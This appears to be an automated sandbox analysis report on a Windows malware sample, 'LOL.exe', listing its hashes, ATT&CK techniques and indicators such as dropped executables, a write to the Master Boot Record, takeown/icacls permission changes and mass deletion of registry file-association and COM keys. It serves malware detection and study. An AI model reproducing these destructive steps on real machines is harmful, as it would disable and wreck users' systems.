8336cd63887054c04ceb4279c608847a21dcdc96ed961704205dc655256ea85d

General

Target

LOL.exe
Size

251KB
MD5

7da870c0e576e4c1efcdecc72cd3b6c1
SHA1

50075bd0691ac4cc1fdd49419596a50e774e9d7f
SHA256

8336cd63887054c04ceb4279c608847a21dcdc96ed961704205dc655256ea85d
SHA512

f4a7646ba9f5c07e7e70d7c3a252600c0f5872dfe7644f5d152f606b61e85cc61a169e03eef8fd4cb47de8187075269d8f0e6aacd3edbc939f12c9032ea68b18
SSDEEP

6144:/5VP9Ge3+hoAvdeJBbLncZiJhSQnLEWyvkwel:/5393whFOBbxJkQwWyvCl

Score

8^/10

bootkit discovery evasion exploit persistence

Malware Config

Signatures

Disables Task Manager via registry modification
evasion
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

2656 takeown.exe
2480 icacls.exe
2780 takeown.exe
2628 icacls.exe
Executes dropped EXE 3 IoCs

Processes:

lolololol.exeMBR.exeGDI.exe

pid process

2644 lolololol.exe
1768 MBR.exe
2776 GDI.exe
Loads dropped DLL 1 IoCs

Processes:

LOL.exe

pid process

1288 LOL.exe
Modifies file permissions 1 TTPs 4 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

2656 takeown.exe
2480 icacls.exe
2780 takeown.exe
2628 icacls.exe

pid	process
2656	takeown.exe
2480	icacls.exe
2780	takeown.exe
2628	icacls.exe

pid	process
2644	lolololol.exe
1768	MBR.exe
2776	GDI.exe

pid	process
1288	LOL.exe

pid	process
2656	takeown.exe
2480	icacls.exe
2780	takeown.exe
2628	icacls.exe

Modifies system executable filetype association 2 TTPs 45 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runasuser	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\ContextMenuHandlers\Compatibility	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\DropHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\{8895b1c6-b41f-4c1c-a562-0d564250836f}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\print	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\DropHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\IconHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runas	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\Compatibility	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\edit\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\Compatibility	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\edit	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shellex	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\OpenContainingFolderMenu	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\DropHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\ContextMenuHandlers	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\DefaultIcon	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\DefaultIcon	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\{00021401-0000-0000-C000-000000000046}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runas\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shellex\DropHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\print\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runasuser\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\CLSID	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\IconHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runasuser	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\DropHandler	reg.exe

Registers COM server for autorun 1 TTPs 64 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0015-0000-0059-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0013-0001-0004-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3B06E95F-E47C-11CD-8701-00AA003F0F07}\InprocServer32\14.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{73A4C9C1-D68D-11D0-98BF-00A0C90DC8D9}\InprocServer32\14.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{80757338-5146-11D5-A672-00B0D022E945}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0013-0001-0016-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0015-0000-0085-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{80757358-5146-11D5-A672-00B0D022E945}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{08F6C813-3CFD-11D1-98BC-006008197D41}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0002E170-0000-0000-C000-000000000046}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0014-0002-0037-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D66DC78C-4F61-447F-942B-3FB6980118CF}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{91493446-5A91-11CF-8700-00AA0060263B}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0014-0002-0007-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0013-0001-0002-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0014-0002-0012-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0017-0000-0026-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0017-0000-0035-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0013-0001-0003-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0015-0000-0033-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0016-0000-0074-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0017-0000-0049-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3B06E993-E47C-11CD-8701-00AA003F0F07}\InprocServer32\14.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{80757306-5146-11D5-A672-00B0D022E945}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0015-0000-0058-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0017-0000-0006-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0017-0000-0012-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0016-0000-0094-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{807573E3-5146-11D5-A672-00B0D022E945}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0015-0000-0076-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0016-0000-0017-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CD7791B9-43FD-42C5-AE42-8DD2811F0419}\InprocServer32\14.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5852F5ED-8BF4-11D4-A245-0080C6F74284}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3B06E973-E47C-11CD-8701-00AA003F0F07}\InprocServer32\14.0.0.0	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0016-0000-0060-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00020820-0000-0000-C000-000000000046}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{91493443-5A91-11CF-8700-00AA0060263B}\InprocServer32\14.0.0.0	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0016-0000-0003-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0002E17C-0000-0000-C000-000000000046}\InprocServer32\14.0.0.0	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0015-0000-0077-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0016-0000-0087-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0015-0000-0042-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0015-0000-0064-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0017-0000-0009-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3B06E959-E47C-11CD-8701-00AA003F0F07}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0013-0001-0009-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0017-0000-0073-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8D4F994C-EBBE-4F8D-BA4B-AE20CD36E72D}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0016-0000-0034-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{490D6966-005D-36A5-B7EF-521A24207E7E}\InprocServer32\14.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{000209F4-0000-0000-C000-000000000046}\InprocServer32\14.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{312AB530-ECC9-496E-AE0E-C9E6C5392499}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{33D9A761-90C8-11d0-BD43-00A0C911CE86}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00020800-0000-0000-C000-000000000046}\InprocServer32\14.0.0.0	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0016-0000-0025-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0017-0000-0045-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0016-0000-0036-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{807573C8-5146-11D5-A672-00B0D022E945}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0017-0000-0014-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0015-0000-0032-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{80757336-5146-11D5-A672-00B0D022E945}\InprocServer32\14.0.0.0	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0015-0000-0030-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0015-0000-0036-ABCDEFFEDCBC}\InprocServer32	reg.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1542.003

Processes:

MBR.exe

description ioc process

File opened for modification \??\PhysicalDrive0 MBR.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	MBR.exe

Drops file in System32 directory 2 IoCs

Processes:

ReAgentc.exe

description	ioc	process
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	ReAgentc.exe
File opened for modification	C:\Windows\system32\Recovery	ReAgentc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

2616 taskkill.exe
2940 taskkill.exe

pid	process
2616	taskkill.exe
2940	taskkill.exe

Modifies registry class 64 IoCs

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\PowerPoint.Slide	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{A8B7C37B-0435-390C-8235-E24D05A40041}\14.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\VLC.avi\shell\AddToPlaylistVLC	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E7534B16-41D4-411E-8D37-4B57A0C2DF8C}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B900744-6D7C-4B86-AA5E-61409EC11A00}\TypeLib	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0017-0000-0014-ABCDEFFEDCBB}	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0017-0000-0051-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{055BD522-D36A-4283-A47F-6DAFE570F93B}\1.0\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{000630A8-0000-0000-C000-000000000046}\TypeLib	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{353631D1-B8FA-4226-A53E-04E9E44A583B}\TypeLib	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CDO.NNTPPostConnector	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BC29A660-30E3-11D0-9E69-00C04FD7C15B}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00020867-0000-0000-C000-000000000046}\ProxyStubClsid	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3059008A-98B5-11CF-BB82-00AA00BDCE0B}\TypeLib	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0015-0000-0004-ABCDEFFEDCBA}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1023B448-2115-4CB8-B65A-D1F1AA766638}\NumMethods	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\AuxUserType\2	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{02748B39-23EB-4BDF-84B1-3790F3E111CA}\TypeLib	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{19867B40-D08F-11D4-BBA7-00010246B3E5}\TypeLib	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0016-0000-0022-ABCDEFFEDCBC}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9C24A977-0951-451A-8006-0E49BD28CD5F}\Instance	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{f414c262-6ac0-11cf-b6d1-00aa00bbbb58}\Implemented Categories	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00020943-0000-0000-C000-000000000046}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0002124A-0000-0000-C000-000000000046}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0B562663-35FD-4F4A-A987-80FC083F74B1}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Access.Application.14\search\AnalyzeInExcel\ddeexec	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00020900-0000-0000-C000-000000000046}\PersistentHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{cc5bbec3-db4a-4bed-828d-08d78ee3e1ed}\Implemented Categories\{F0B7A1A2-9847-11CF-8F20-00805F2CD064}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{30510736-98B5-11CF-BB82-00AA00BDCE0B}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Word.Document.12\CLSID	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{C1F400A4-3F08-11D3-9F0B-006008039E37}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2E629606-312A-482F-9B12-2C4ABF6F0B6D}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Access.ShortCut.View	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\PowerPoint.Slide.8\protocol\StdFileEditing	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Word.Document.8\shell\ViewProtected	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{02BCC737-B171-4746-94C9-0D8A0B2C0089}\ProgID	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00020998-0000-0000-C000-000000000046}\TypeLib	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{096CD740-0786-11D1-95FA-0080C78EE3BB}\ProxyStubClsid	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{4291224C-DEFE-485B-8E69-6CF8AA85CB76}\TypeLib	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Equation.3	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Excel.OpenDocumentSpreadsheet.12\shell\Print\ddeexec\application	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{F00164C2-B17B-11CE-A95D-00AA006CB389}\11.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00067366-0000-0000-C000-000000000046}\ProxyStubClsid	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1162FBCA-7D93-44F4-991E-65589FF8D724}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3450ADE9-3E03-426B-88E4-B7A3B2E27B51}\TypeLib	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F49C559D-E9E5-467C-8C18-3326AAE4EBCC}\ProgID	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0002093A-0000-0000-C000-000000000046}\ProxyStubClsid	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.potx\ShellEx\{BB2E617C-0920-11d1-9A0B-00C04FC2D6C1}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{A8561903-5F3F-31BF-BED3-D2CBB460F666}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\SOFTWARE\Microsoft\HTMLHelp\2.0\LocalReg\CLSID	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{000204EF-0000-0000-C000-000000000046}\2.1\9\win32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{3935993E-9726-4CED-B48C-AD7CA5D0AF64}\1.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{10154F28-4979-4166-B114-3E7A7926C747}\OLEDB_SERVICES	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{000630F4-0000-0000-C000-000000000046}\ProxyStubClsid	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Microsoft.DirectMusicComposer\CurVer	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{949D00C2-04C5-34FB-A9AA-F966483B143C}\14.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\PropertySheetHandlers\{7EFA68C6-086B-43e1-A2D2-55A113531240}	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0015-0000-0025-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{CAFEEFAC-0016-0000-0057-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Components\109DB75EC8032D11A9A90006794C4E25	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{11A66240-5489-42C2-AEBF-286FC831524C}\NumMethods	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C1646BC4-F298-4F91-A204-EB2DD1709D1A}\NumMethods	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WECAPI5.FpwUser	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0006F04D-0000-0000-C000-000000000046}\LocalServer32	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2740 PING.EXE

pid	process
2740	PING.EXE

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

takeown.exetakeown.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeTakeOwnershipPrivilege	2656	takeown.exe
Token: SeTakeOwnershipPrivilege	2780	takeown.exe
Token: SeDebugPrivilege	2616	taskkill.exe
Token: SeDebugPrivilege	2940	taskkill.exe

Suspicious use of WriteProcessMemory 51 IoCs

Processes:

LOL.exelolololol.execmd.execmd.exe

description	pid	process	target process
PID 1288 wrote to memory of 1748	1288	LOL.exe	cmd.exe
